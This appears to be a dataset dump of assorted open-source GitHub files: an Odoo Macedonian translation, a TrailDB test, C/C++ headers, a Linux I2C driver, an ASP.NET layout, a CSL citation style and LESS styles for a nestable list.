text
stringlengths
2
100k
meta
dict
# Translation of Odoo Server. # This file contains the translation of the following modules: # * product_extended # # Translators: msgid "" msgstr "" "Project-Id-Version: Odoo 9.0\n" "Report-Msgid-Bugs-To: \n" "POT-Creation-Date: 2016-08-18 14:07+0000\n" "PO-Revision-Date: 2015-10-22 12:09+0000\n" "Last-Translator: Aleksandar Vangelovski <[email protected]>\n" "Language-Team: Macedonian (http://www.transifex.com/odoo/odoo-9/language/" "mk/)\n" "Language: mk\n" "MIME-Version: 1.0\n" "Content-Type: text/plain; charset=UTF-8\n" "Content-Transfer-Encoding: \n" "Plural-Forms: nplurals=2; plural=(n % 10 == 1 && n % 100 != 11) ? 0 : 1;\n" #. module: product_extended #: code:addons/product_extended/wizard/wizard_price.py:24 #: code:addons/product_extended/wizard/wizard_price.py:40 #, python-format msgid "Active ID is not set in Context." msgstr "Активниот идентификациски број не е подесен во Контекстот." #. module: product_extended #: model:ir.model,name:product_extended.model_mrp_bom msgid "Bill of Material" msgstr "Норматив" #. module: product_extended #: model_terms:ir.ui.view,arch_db:product_extended.view_compute_price_wizard msgid "Cancel" msgstr "Откажи" #. module: product_extended #: model_terms:ir.ui.view,arch_db:product_extended.view_compute_price_wizard msgid "Change Price" msgstr "Промени цена" #. module: product_extended #: model_terms:ir.ui.view,arch_db:product_extended.view_compute_price_wizard msgid "Change Standard Price" msgstr "Промени стандардна цена" #. module: product_extended #: model:ir.model.fields,field_description:product_extended.field_wizard_price_recursive msgid "Change prices of child BoMs too" msgstr "Промени ги цените на под нормативите исто така" #. module: product_extended #: model:ir.actions.act_window,name:product_extended.action_view_compute_price_wizard #: model:ir.model,name:product_extended.model_wizard_price msgid "Compute Price Wizard" msgstr "Волшебник за пресметка на цени" #. 
module: product_extended #: model_terms:ir.ui.view,arch_db:product_extended.product_product_ext_form_view2 msgid "Compute from BOM" msgstr "" #. module: product_extended #: model_terms:ir.ui.view,arch_db:product_extended.product_product_ext_form_view2 msgid "" "Compute the price of the product using products and operations of related " "bill of materials, for manufactured products only." msgstr "" #. module: product_extended #: model:ir.model.fields,field_description:product_extended.field_wizard_price_create_uid msgid "Created by" msgstr "Креирано од" #. module: product_extended #: model:ir.model.fields,field_description:product_extended.field_wizard_price_create_date msgid "Created on" msgstr "Креирано на" #. module: product_extended #: model:ir.model.fields,field_description:product_extended.field_wizard_price_display_name msgid "Display Name" msgstr "Прикажи име" #. module: product_extended #: model:ir.model.fields,field_description:product_extended.field_wizard_price_real_time_accounting msgid "Generate accounting entries when real-time" msgstr "Генерирај сметководствени внесови кога реално" #. module: product_extended #: model:ir.model.fields,field_description:product_extended.field_wizard_price_id msgid "ID" msgstr "ID" #. module: product_extended #: model:ir.model.fields,field_description:product_extended.field_wizard_price_info_field msgid "Info" msgstr "Информација" #. module: product_extended #: model:ir.model.fields,field_description:product_extended.field_wizard_price___last_update msgid "Last Modified on" msgstr "Последна промена на" #. module: product_extended #: model:ir.model.fields,field_description:product_extended.field_wizard_price_write_uid msgid "Last Updated by" msgstr "Последно ажурирање од" #. module: product_extended #: model:ir.model.fields,field_description:product_extended.field_wizard_price_write_date msgid "Last Updated on" msgstr "Последно ажурирање на" #. 
module: product_extended #: model:ir.model.fields,field_description:product_extended.field_mrp_bom_get_variant_count msgid "Number of variant for the product" msgstr "" #. module: product_extended #: model:ir.model,name:product_extended.model_product_template msgid "Product Template" msgstr "Урнек на производ" #. module: product_extended #: model_terms:ir.ui.view,arch_db:product_extended.view_compute_price_wizard msgid "Set price on BoM" msgstr "Подеси цена на норматив" #. module: product_extended #: model:ir.model.fields,field_description:product_extended.field_mrp_bom_standard_price msgid "Standard Price" msgstr "Стандардна цена" #. module: product_extended #: model_terms:ir.ui.view,arch_db:product_extended.view_compute_price_wizard msgid "" "The price is computed from the bill of material lines which are not variant " "specific" msgstr "" "Цената се оформува според сметката од ставките на материјалот кои што не се " "варијантно специфични" #. module: product_extended #: code:addons/product_extended/wizard/wizard_price.py:38 #, fuzzy, python-format msgid "" "This wizard is built for product templates, while you are currently running " "it from a product variant." msgstr "" "Овој волшебник е направен за урнеци на производи, додека моментално го " "користите од варијанта на производ." #~ msgid "Compute price wizard" #~ msgstr "Волшебник за пресметка на цени"
{ "pile_set_name": "Github" }
let v = A1_a2.v
{ "pile_set_name": "Github" }
#include <stdio.h> #include <stdlib.h> #include <assert.h> #include <string.h> #include <traildb.h> #include "tdb_test.h" static tdb *make_tdb(const char *root, const uint64_t *tstamps, uint32_t num, int should_fail) { static uint8_t uuid[16]; const char *fields[] = {}; tdb_cons* c = tdb_cons_init(); test_cons_settings(c); uint64_t zero = 0; uint32_t i; assert(tdb_cons_open(c, root, fields, 0) == 0); for (i = 0; i < num; i++) assert(tdb_cons_add(c, uuid, tstamps[i], fields, &zero) == 0); assert(tdb_cons_finalize(c) == (should_fail ? TDB_ERR_TIMESTAMP_TOO_LARGE: 0)); tdb_cons_close(c); if (!should_fail){ tdb* t = tdb_init(); assert(tdb_open(t, root) == 0); return t; }else return NULL; } int main(int argc, char** argv) { /* small min_timestamp, large max_timedelta, sorted */ const uint64_t TSTAMPS1[] = {1, 2, 3, UINT32_MAX, UINT32_MAX + 1LLU, TDB_MAX_TIMEDELTA - 10, TDB_MAX_TIMEDELTA - 9, TDB_MAX_TIMEDELTA - 8}; /* large min_timestamp, small max_timedelta, reverse order */ const uint64_t TSTAMPS2[] = {TDB_MAX_TIMEDELTA - 1, TDB_MAX_TIMEDELTA - 3, TDB_MAX_TIMEDELTA - 5}; /* this should not fail */ const uint64_t TSTAMPS3[] = {10, TDB_MAX_TIMEDELTA + 9}; /* this should fail */ const uint64_t TSTAMPS4[] = {10, TDB_MAX_TIMEDELTA + 11}; /* this should fail */ const uint64_t TSTAMPS5[] = {TDB_MAX_TIMEDELTA + 1}; const tdb_event *event; uint64_t i, num_events = sizeof(TSTAMPS1) / sizeof(TSTAMPS1[0]); tdb *db = make_tdb(getenv("TDB_TMP_DIR"), TSTAMPS1, num_events, 0); tdb_cursor *cursor = tdb_cursor_new(db); assert(tdb_get_trail(cursor, 0) == 0); for (i = 0; (event = tdb_cursor_next(cursor)); i++) assert(event->timestamp == TSTAMPS1[i]); assert(i == num_events); tdb_close(db); tdb_cursor_free(cursor); num_events = sizeof(TSTAMPS2) / sizeof(TSTAMPS2[0]); db = make_tdb(getenv("TDB_TMP_DIR"), TSTAMPS2, num_events, 0); cursor = tdb_cursor_new(db); assert(tdb_get_trail(cursor, 0) == 0); for (i = 1; (event = tdb_cursor_next(cursor)); i++) /* reverse order */ 
assert(event->timestamp == TSTAMPS2[num_events - i]); assert(i == num_events + 1); tdb_close(db); tdb_cursor_free(cursor); num_events = sizeof(TSTAMPS3) / sizeof(TSTAMPS3[0]); db = make_tdb(getenv("TDB_TMP_DIR"), TSTAMPS3, num_events, 0); cursor = tdb_cursor_new(db); assert(tdb_get_trail(cursor, 0) == 0); for (i = 0; (event = tdb_cursor_next(cursor)); i++) assert(event->timestamp == TSTAMPS3[i]); assert(i == num_events); tdb_close(db); tdb_cursor_free(cursor); make_tdb(getenv("TDB_TMP_DIR"), TSTAMPS4, sizeof(TSTAMPS4) / sizeof(TSTAMPS4[0]), 1); make_tdb(getenv("TDB_TMP_DIR"), TSTAMPS5, sizeof(TSTAMPS5) / sizeof(TSTAMPS5[0]), 1); return 0; }
{ "pile_set_name": "Github" }
Abyss 2.4.0.3 X2;no-cache Abyss 2.5.0.0 X1;no-cache AOLserver 3.3.1;No-Cache AOLserver 4.0.10a;no-cache AOLserver 4.0.10;no-cache AOLserver 4.5.0;no-cache Apache 1.3.26;no-cache Apache 1.3.27;no-cache Apache 1.3.33;no-cache Apache 1.3.34;no-cache Apache 1.3.37;no-cache Apache 1.3.39;no-cache Apache 2.0.45;no-cache Apache 2.0.46;no-cache Apache 2.0.52;no-cache Apache 2.0.54;no-cache Apache 2.0.59;nocache Apache 2.0.59;No-cache Apache 2.2.2;no-cache Apache 2.2.3;no-cache Apache 2.2.3;private Apache 2.2.4;no-cache Apache 2.2.6;no-cache Belkin Router 2.00.002;no-cache Cherokee 0.6.0;no-cache Cisco VPN 3000 Concentrator Virata EmWeb R6.2.0;no-cache Cougar 9.5.6001.6264;no-cache FlexWATCH FW-3440-B;no-cache fnord 1.8a;no-cache GlobalSCAPE Secure Server 3.3;no-cache Hiawatha 6.11;no-cache Hiawatha 6.2;no-cache IBM HTTP Server 6.0.2.19;no-cache IceWarp 8.3.0;no-cache Jana-Server 2.4.8.51;no-cache Jetty 6.1.1;no-cache lighttpd 1.4.19;no-cache lighttpd 1.4.22;no-cache LiteSpeed Web Server 3.3;no-cache Microsoft IIS 6.0;no-cache Nanoweb 2.2.10;no-cache nginx 0.5.32;no-cache nginx 0.5.35;no-cache nginx 0.6.16;no-cache nginx 0.6.20;no-cache Novell Access Manager 3;no-cache Ricoh Aficio 1022 Web-Server 3.0;no-cache Ricoh Aficio 1045 5.23 Web-Server 3.0;no-cache Ricoh Aficio 1060 3.53.3 Web-Server 3.0;no-cache Ricoh Aficio 6002 3.53.3 Web-Server 3.0;no-cache Roxen 2.2.213;no-cache SnapStream Digital Video Recorder;no-cache Sony SNC-RZ30 NetEVI 1.09;no-cache Sony SNC-RZ30 NetEVI 2.05g;no-cache Sony SNC-RZ30 NetEVI 2.05;no-cache Sony SNC-RZ30 NetEVI 2.06;no-cache Sony SNC-RZ30 NetEVI 2.13;no-cache Sony SNC-RZ30 NetEVI 2.14;no-cache Sony SNC-RZ30 NetEVI 2.24;no-cache Sony SNC-RZ30 NetEVI 3.01;no-cache Sony SNC-RZ30 NetEVI 3.02;no-cache Sony SNC-RZ30 NetEVI 3.03;no-cache Sony SNC-RZ30 NetEVI 3.10a;no-cache Sony SNC-RZ30 NetEVI 3.10;no-cache Sony SNC-RZ30 NetEVI 3.14;no-cache Sony SNC-Z20 NetZoom 1.00;no-cache Symantec Mail Security for SMTP;No-Cache WDaemon 9.6.1;no-cache webcamXP 
PRO 2006 2.16.456x BETA;no-cache webcamXP PRO 2006 2.20.024;no-cache webcamXP PRO 2006 2.37.144;no-cache webcamXP PRO 2007 3.60.220;no-cache webcamXP PRO 2007 3.72.440;no-cache webcamXP PRO 2007 3.96.000 beta;no-cache Zope 2.6.0;no-cache Zyxel P-2602HW-D1A RomPager 4.51;no-cache Zyxel P-660R-D3 RomPager 4.51;no-cache Zyxel P-661H-D1 RomPager 4.51;no-cache Zyxel P-662HW-D1 RomPager 4.51;no-cache Zyxel Prestige 662H-61 RomPager 4.07;no-cache Zyxel Prestige 662H-63/67 RomPager 4.07;no-cache Zyxel ZyWALL 10W RomPager 4.07;no-cache
{ "pile_set_name": "Github" }
<button class="bx-btn bx-btn-img" __extended_css__ __extended_action__> <u style="background-image:url(__action_img_src__)">__action_caption__</u> </button>
{ "pile_set_name": "Github" }
package request import ( "io" "sync" ) // offsetReader is a thread-safe io.ReadCloser to prevent racing // with retrying requests type offsetReader struct { buf io.ReadSeeker lock sync.Mutex closed bool } func newOffsetReader(buf io.ReadSeeker, offset int64) *offsetReader { reader := &offsetReader{} buf.Seek(offset, 0) reader.buf = buf return reader } // Close will close the instance of the offset reader's access to // the underlying io.ReadSeeker. func (o *offsetReader) Close() error { o.lock.Lock() defer o.lock.Unlock() o.closed = true return nil } // Read is a thread-safe read of the underlying io.ReadSeeker func (o *offsetReader) Read(p []byte) (int, error) { o.lock.Lock() defer o.lock.Unlock() if o.closed { return 0, io.EOF } return o.buf.Read(p) } // Seek is a thread-safe seeking operation. func (o *offsetReader) Seek(offset int64, whence int) (int64, error) { o.lock.Lock() defer o.lock.Unlock() return o.buf.Seek(offset, whence) } // CloseAndCopy will return a new offsetReader with a copy of the old buffer // and close the old buffer. func (o *offsetReader) CloseAndCopy(offset int64) *offsetReader { o.Close() return newOffsetReader(o.buf, offset) }
{ "pile_set_name": "Github" }
/**************************************************************************** Copyright (c) 2010-2012 cocos2d-x.org Copyright (c) 2013-2014 Chukong Technologies Inc. http://www.cocos2d-x.org Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. ****************************************************************************/ #ifndef __SUPPORT_BASE64_H__ #define __SUPPORT_BASE64_H__ #ifdef __cplusplus extern "C" { #endif namespace cocos2d { /** @file base64 helper functions */ /** * Decodes a 64base encoded memory. The decoded memory is * expected to be freed by the caller by calling `free()` * * @returns the length of the out buffer * @since v0.8.1 */ int base64Decode(const unsigned char *in, unsigned int inLength, unsigned char **out); /** * Encodes bytes into a 64base encoded memory with terminating '\0' character. 
* The encoded memory is expected to be freed by the caller by calling `free()` * * @returns the length of the out buffer * @since v2.1.4 */ int base64Encode(const unsigned char *in, unsigned int inLength, char **out); }//namespace cocos2d #ifdef __cplusplus } #endif #endif // __SUPPORT_BASE64_H__
{ "pile_set_name": "Github" }
//========= Copyright Valve Corporation, All rights reserved. ============// // // Purpose: // // $NoKeywords: $ // //=====================================================================================// #ifndef SCREENSPACEEFFECTS_H #define SCREENSPACEEFFECTS_H #ifdef _WIN32 #pragma once #endif class KeyValues; //------------------------------------------------------------------------------ // Simple base class for screen space post-processing effects //------------------------------------------------------------------------------ abstract_class IScreenSpaceEffect { public: virtual void Init( ) = 0; virtual void Shutdown( ) = 0; virtual void SetParameters( KeyValues *params ) = 0; virtual void Render( int x, int y, int w, int h ) = 0; virtual void Enable( bool bEnable ) = 0; virtual bool IsEnabled( ) = 0; }; //------------------------------------------------------------------------------ // Interface class for managing screen space post-processing effects //------------------------------------------------------------------------------ abstract_class IScreenSpaceEffectManager { public: virtual void InitScreenSpaceEffects( ) = 0; virtual void ShutdownScreenSpaceEffects( ) = 0; virtual IScreenSpaceEffect *GetScreenSpaceEffect( const char *pEffectName ) = 0; virtual void SetScreenSpaceEffectParams( const char *pEffectName, KeyValues *params ) = 0; virtual void SetScreenSpaceEffectParams( IScreenSpaceEffect *pEffect, KeyValues *params ) = 0; virtual void EnableScreenSpaceEffect( const char *pEffectName ) = 0; virtual void EnableScreenSpaceEffect( IScreenSpaceEffect *pEffect ) = 0; virtual void DisableScreenSpaceEffect( const char *pEffectName ) = 0; virtual void DisableScreenSpaceEffect( IScreenSpaceEffect *pEffect ) = 0; virtual void DisableAllScreenSpaceEffects( ) = 0; virtual void RenderEffects( int x, int y, int w, int h ) = 0; }; extern IScreenSpaceEffectManager *g_pScreenSpaceEffects; 
//------------------------------------------------------------------------------------- // Registration class for adding screen space effects to the IScreenSpaceEffectManager //------------------------------------------------------------------------------------- class CScreenSpaceEffectRegistration { public: CScreenSpaceEffectRegistration( const char *pName, IScreenSpaceEffect *pEffect ); const char *m_pEffectName; IScreenSpaceEffect *m_pEffect; CScreenSpaceEffectRegistration *m_pNext; static CScreenSpaceEffectRegistration *s_pHead; }; #define ADD_SCREENSPACE_EFFECT( CEffect, pEffectName ) CEffect pEffectName##_effect; \ CScreenSpaceEffectRegistration pEffectName##_reg( #pEffectName, &pEffectName##_effect ); #endif
{ "pile_set_name": "Github" }
/** * Checker to compare output and answer in the form: * * Case 1: <token> <token> ... <token> * Case 2: <token> <token> ... <token> * ... * Case n: <token> <token> ... <token> * */ #include "testlib.h" #include <iostream> #include <sstream> #include <fstream> #include <iomanip> #include <string> #include <cstdlib> #include <cstdio> #include <cstring> #include <cmath> #include <ctime> #include <climits> #include <cassert> #include <vector> #include <queue> #include <stack> #include <deque> #include <set> #include <map> #include <bitset> #include <utility> #include <algorithm> using namespace std; #define forn(i, n) for (int i = 0; i < int(n); i++) string token; vector<string> readStreamCase(InStream& in, TResult pe, int testCase, bool& prereadCase) { if (!prereadCase) { string caseStr = in.readToken(); if (caseStr != "Case") quitf(pe, "Expected 'Case' but found '%s' [test case %d]", compress(caseStr).c_str(), testCase); } string numExpStr; stringstream ss; ss << testCase; ss >> numExpStr; numExpStr += ":"; string numStr = in.readToken(); if (numExpStr != numStr) quitf(pe, "Expected '%s' but found '%s' [test case %d]", compress(numExpStr).c_str(), compress(numStr).c_str(), testCase); vector<string> result; while (!in.seekEof()) { in.readTokenTo(token); if (token == "Case") { prereadCase = true; break; } result.push_back(token); } return result; } string stringsToString(const vector<string>& a) { if (a.empty()) return "\"\" [size=0]"; string elems; forn(i, a.size()) elems += a[i] + " "; return format("\"%s\" [size=%u]", compress(trim(elems)).c_str(), (unsigned int)(a.size())); } int main(int argc, char* argv[]) { setName("Tokens checker with testcase-support"); registerTestlibCmd(argc, argv); int testCase = 0; bool ansPrereadCase = false; bool oufPrereadCase = false; while (!ans.seekEof()) { testCase++; vector<string> ja = readStreamCase(ans, _fail, testCase, ansPrereadCase); vector<string> pa = readStreamCase(ouf, _pe, testCase, oufPrereadCase); if (ja != pa) { 
string js = stringsToString(ja); string ps = stringsToString(pa); quitf(_wa, "Sequences differ: jury has %s, but participant has %s [test case %d]", js.c_str(), ps.c_str(), testCase); } } quitf(_ok, "%d test cases(s)", testCase); }
{ "pile_set_name": "Github" }
<!DOCTYPE html> <html> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <title>@ViewData["Title"] - WebStartup.Web</title> <environment include="Development"> <link rel="stylesheet" href="~/lib/bootstrap/dist/css/bootstrap.css" /> </environment> <environment exclude="Development"> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css" asp-fallback-href="~/lib/bootstrap/dist/css/bootstrap.min.css" asp-fallback-test-class="sr-only" asp-fallback-test-property="position" asp-fallback-test-value="absolute" crossorigin="anonymous" integrity="sha256-eSi1q2PG6J7g7ib17yAaWMcrr5GrtohYChqibrV7PBE="/> </environment> <link rel="stylesheet" href="~/css/site.css" /> </head> <body> <header> <nav class="navbar navbar-expand-sm navbar-toggleable-sm navbar-light bg-white border-bottom box-shadow mb-3"> <div class="container"> <a class="navbar-brand" asp-area="" asp-controller="Home" asp-action="Index">WebStartup.Web</a> <button class="navbar-toggler" type="button" data-toggle="collapse" data-target=".navbar-collapse" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation"> <span class="navbar-toggler-icon"></span> </button> <div class="navbar-collapse collapse d-sm-inline-flex flex-sm-row-reverse"> <ul class="navbar-nav flex-grow-1"> <li class="nav-item"> <a class="nav-link text-dark" asp-area="" asp-controller="Home" asp-action="Index">Home</a> </li> <li class="nav-item"> <a class="nav-link text-dark" asp-area="" asp-controller="Home" asp-action="Privacy">Privacy</a> </li> </ul> </div> </div> </nav> </header> <div class="container"> <partial name="_CookieConsentPartial" /> <main role="main" class="pb-3"> @RenderBody() </main> </div> <footer class="border-top footer text-muted"> <div class="container"> &copy; 2019 - WebStartup.Web - <a asp-area="" asp-controller="Home" asp-action="Privacy">Privacy</a> </div> </footer> <environment 
include="Development"> <script src="~/lib/jquery/dist/jquery.js"></script> <script src="~/lib/bootstrap/dist/js/bootstrap.bundle.js"></script> </environment> <environment exclude="Development"> <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js" asp-fallback-src="~/lib/jquery/dist/jquery.min.js" asp-fallback-test="window.jQuery" crossorigin="anonymous" integrity="sha256-FgpCb/KJQlLNfOu91ta32o/NMZxltwRo8QtmkMRdAu8="> </script> <script src="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/js/bootstrap.bundle.min.js" asp-fallback-src="~/lib/bootstrap/dist/js/bootstrap.bundle.min.js" asp-fallback-test="window.jQuery && window.jQuery.fn && window.jQuery.fn.modal" crossorigin="anonymous" integrity="sha256-E/V4cWE4qvAeO5MOhjtGtqDzPndRO1LBk8lJ/PR7CA4="> </script> </environment> <script src="~/js/site.js" asp-append-version="true"></script> @RenderSection("Scripts", required: false) </body> </html>
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="utf-8"?> <style xmlns="http://purl.org/net/xbiblio/csl" version="1.0" default-locale="en-US"> <!-- Generated with https://github.com/citation-style-language/utilities/tree/master/generate_dependent_styles/data/springer --> <info> <title>Triple Helix</title> <id>http://www.zotero.org/styles/triple-helix</id> <link href="http://www.zotero.org/styles/triple-helix" rel="self"/> <link href="http://www.zotero.org/styles/springer-basic-author-date" rel="independent-parent"/> <link href="http://www.springer.com/cda/content/document/cda_downloaddocument/Key_Style_Points_1.0.pdf" rel="documentation"/> <link href="http://www.springer.com/cda/content/document/cda_downloaddocument/manuscript-guidelines-1.0.pdf" rel="documentation"/> <category citation-format="author-date"/> <eissn>2197-1927</eissn> <updated>2014-05-15T12:00:00+00:00</updated> <rights license="http://creativecommons.org/licenses/by-sa/3.0/">This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License</rights> </info> </style>
{ "pile_set_name": "Github" }
/* * Copyright (C) 2005 Simtec Electronics * Ben Dooks <[email protected]> * * Simtec Generic I2C Controller * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA */ #include <linux/kernel.h> #include <linux/module.h> #include <linux/init.h> #include <linux/delay.h> #include <linux/platform_device.h> #include <linux/slab.h> #include <linux/io.h> #include <linux/i2c.h> #include <linux/i2c-algo-bit.h> struct simtec_i2c_data { struct resource *ioarea; void __iomem *reg; struct i2c_adapter adap; struct i2c_algo_bit_data bit; }; #define CMD_SET_SDA (1<<2) #define CMD_SET_SCL (1<<3) #define STATE_SDA (1<<0) #define STATE_SCL (1<<1) /* i2c bit-bus functions */ static void simtec_i2c_setsda(void *pw, int state) { struct simtec_i2c_data *pd = pw; writeb(CMD_SET_SDA | (state ? STATE_SDA : 0), pd->reg); } static void simtec_i2c_setscl(void *pw, int state) { struct simtec_i2c_data *pd = pw; writeb(CMD_SET_SCL | (state ? STATE_SCL : 0), pd->reg); } static int simtec_i2c_getsda(void *pw) { struct simtec_i2c_data *pd = pw; return readb(pd->reg) & STATE_SDA ? 1 : 0; } static int simtec_i2c_getscl(void *pw) { struct simtec_i2c_data *pd = pw; return readb(pd->reg) & STATE_SCL ? 
1 : 0; } /* device registration */ static int simtec_i2c_probe(struct platform_device *dev) { struct simtec_i2c_data *pd; struct resource *res; int size; int ret; pd = kzalloc(sizeof(struct simtec_i2c_data), GFP_KERNEL); if (pd == NULL) { dev_err(&dev->dev, "cannot allocate private data\n"); return -ENOMEM; } platform_set_drvdata(dev, pd); res = platform_get_resource(dev, IORESOURCE_MEM, 0); if (res == NULL) { dev_err(&dev->dev, "cannot find IO resource\n"); ret = -ENOENT; goto err; } size = resource_size(res); pd->ioarea = request_mem_region(res->start, size, dev->name); if (pd->ioarea == NULL) { dev_err(&dev->dev, "cannot request IO\n"); ret = -ENXIO; goto err; } pd->reg = ioremap(res->start, size); if (pd->reg == NULL) { dev_err(&dev->dev, "cannot map IO\n"); ret = -ENXIO; goto err_res; } /* setup the private data */ pd->adap.owner = THIS_MODULE; pd->adap.algo_data = &pd->bit; pd->adap.dev.parent = &dev->dev; strlcpy(pd->adap.name, "Simtec I2C", sizeof(pd->adap.name)); pd->bit.data = pd; pd->bit.setsda = simtec_i2c_setsda; pd->bit.setscl = simtec_i2c_setscl; pd->bit.getsda = simtec_i2c_getsda; pd->bit.getscl = simtec_i2c_getscl; pd->bit.timeout = HZ; pd->bit.udelay = 20; ret = i2c_bit_add_bus(&pd->adap); if (ret) goto err_all; return 0; err_all: iounmap(pd->reg); err_res: release_resource(pd->ioarea); kfree(pd->ioarea); err: kfree(pd); return ret; } static int simtec_i2c_remove(struct platform_device *dev) { struct simtec_i2c_data *pd = platform_get_drvdata(dev); i2c_del_adapter(&pd->adap); iounmap(pd->reg); release_resource(pd->ioarea); kfree(pd->ioarea); kfree(pd); return 0; } /* device driver */ static struct platform_driver simtec_i2c_driver = { .driver = { .name = "simtec-i2c", .owner = THIS_MODULE, }, .probe = simtec_i2c_probe, .remove = simtec_i2c_remove, }; module_platform_driver(simtec_i2c_driver); MODULE_DESCRIPTION("Simtec Generic I2C Bus driver"); MODULE_AUTHOR("Ben Dooks <[email protected]>"); MODULE_LICENSE("GPL"); 
MODULE_ALIAS("platform:simtec-i2c");
{ "pile_set_name": "Github" }
/* * rl6347a.h - RL6347A class device shared support * * Copyright 2015 Realtek Semiconductor Corp. * * Author: Oder Chiou <[email protected]> * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License version 2 as * published by the Free Software Foundation. */ #ifndef __RL6347A_H__ #define __RL6347A_H__ #include <sound/hda_verbs.h> #define VERB_CMD(V, N, D) ((N << 20) | (V << 8) | D) #define RL6347A_VENDOR_REGISTERS 0x20 #define RL6347A_COEF_INDEX\ VERB_CMD(AC_VERB_SET_COEF_INDEX, RL6347A_VENDOR_REGISTERS, 0) #define RL6347A_PROC_COEF\ VERB_CMD(AC_VERB_SET_PROC_COEF, RL6347A_VENDOR_REGISTERS, 0) struct rl6347a_priv { struct reg_default *index_cache; int index_cache_size; }; int rl6347a_hw_write(void *context, unsigned int reg, unsigned int value); int rl6347a_hw_read(void *context, unsigned int reg, unsigned int *value); #endif /* __RL6347A_H__ */
{ "pile_set_name": "Github" }
## Example: Virtual Network with a Network Security Group This example provisions a Virtual Network containing a single Subnet, with a Network Security Group.
{ "pile_set_name": "Github" }
.enable_plugin_nestable_list() when(@enable-plugin-nestable-list = true) { .dd { position: relative; display: block; margin: 0; padding: 0; max-width: 600px; list-style: none; line-height: 20px; } .dd-list { display: block; position: relative; margin: 0; padding: 0; list-style: none; .dd-list { padding-left: 30px; } .dd-collapsed & { display: none; } } .dd-item, .dd-empty, .dd-placeholder { display: block; position: relative; margin: 0; padding: 0; min-height: 20px; line-height: 20px; } .dd-handle , .dd2-content { display: block; min-height: 38px; margin: 5px 0; padding: 8px 12px; background: #F8FAFF; border: 1px solid #DAE2EA; color: #7C9EB2; text-decoration: none; font-weight: bold; .box-sizing(border-box); &:hover { color: #438EB9; background: #F4F6F7; border-color:#DCE2E8; } &[class*="btn-"] { color:#FFF; border:none; padding: 9px 12px; &:hover { opacity:0.85; color:#FFF; } } } .dd2-handle + .dd2-content, .dd2-handle + .dd2-content[class*="btn-"] { padding-left:44px; } .dd-handle[class*="btn-"]:hover , .dd2-content[class*="btn-"] .dd2-handle[class*="btn-"]:hover + .dd2-content[class*="btn-"] { //opacity:0.85; color:#FFF; } .dd-item > button:hover { ~ .dd-handle , ~ .dd2-content { color: #438EB9; background: #F4F6F7; border-color:#DCE2E8; } ~ .dd-handle[class*="btn-"] , ~ .dd2-content[class*="btn-"] { opacity:0.85; color:#FFF; } } .dd2-handle:hover { ~ .dd2-content { color: #438EB9; background: #F4F6F7; border-color:#DCE2E8; } ~ .dd2-content[class*="btn-"] { opacity:0.85; color:#FFF; } } .dd2-item.dd-item > button { margin-left:34px; } .dd-item > button { display: block; position: relative; z-index:1; cursor: pointer; float: left; width: 25px; height: 20px; margin: 5px 1px 5px 5px; padding: 0; text-indent: 100%; white-space: nowrap; overflow: hidden; border: 0; background: transparent; font-size: @base-font-size - 1; line-height: 1; text-align: center; font-weight: bold; top:4px; left:1px; color:#707070; } .dd-item > button:before { font-family: FontAwesome; 
content: '\f067'; display: block; position: absolute; width: 100%; text-align: center; text-indent: 0; font-weight: normal; font-size: @base-font-size + 1; } .dd-item > button[data-action="collapse"]:before { content: '\f068'; } .dd-item > button:hover { color:#707070; } .dd-item.dd-colored > button , .dd-item.dd-colored > button:hover { color:#EEE; } .dd-placeholder, .dd-empty { margin: 5px 0; padding: 0; min-height: 30px; background: #F0F9FF; border: 2px dashed #BED2DB; .box-sizing(border-box); } .dd-empty { border-color:#AAA; border-style:solid; background-color: #e5e5e5; } .dd-dragel { position: absolute; pointer-events: none; z-index: 999; opacity:0.8; > li > .dd-handle { color:#4B92BE; background:#F1F5FA; border-color:#D6E1EA; //opacity:0.85; border-left:2px solid #777; position:relative; &[class*="btn-"] { color:#FFF; } } } .dd-dragel > .dd-item > .dd-handle { margin-top: 0; } .dd-list > li[class*="item-"] { border-width:0;padding:0; > .dd-handle { border-left:2px solid; border-left-color:inherit; } } .dd-list > li > .dd-handle .sticker { position:absolute; right:0; top:0; } .dd2-handle , .dd-dragel > li > .dd2-handle { position:absolute; left:0; top:0; width:36px; margin:0; border-width:1px 1px 0 0; text-align:center; padding:0 !important; line-height:38px; height:38px; background: #EBEDF2; border: 1px solid #DEE4EA; cursor: pointer; overflow: hidden; position: absolute; z-index:1; } .dd2-handle:hover , .dd-dragel > li > .dd2-handle{ background:#E3E8ED; } .dd2-content[class*="btn-"] { text-shadow:none !important; } .dd2-handle[class*="btn-"] { text-shadow:none !important; background:rgba(0,0,0,0.1) !important; border-right:1px solid #EEE; } 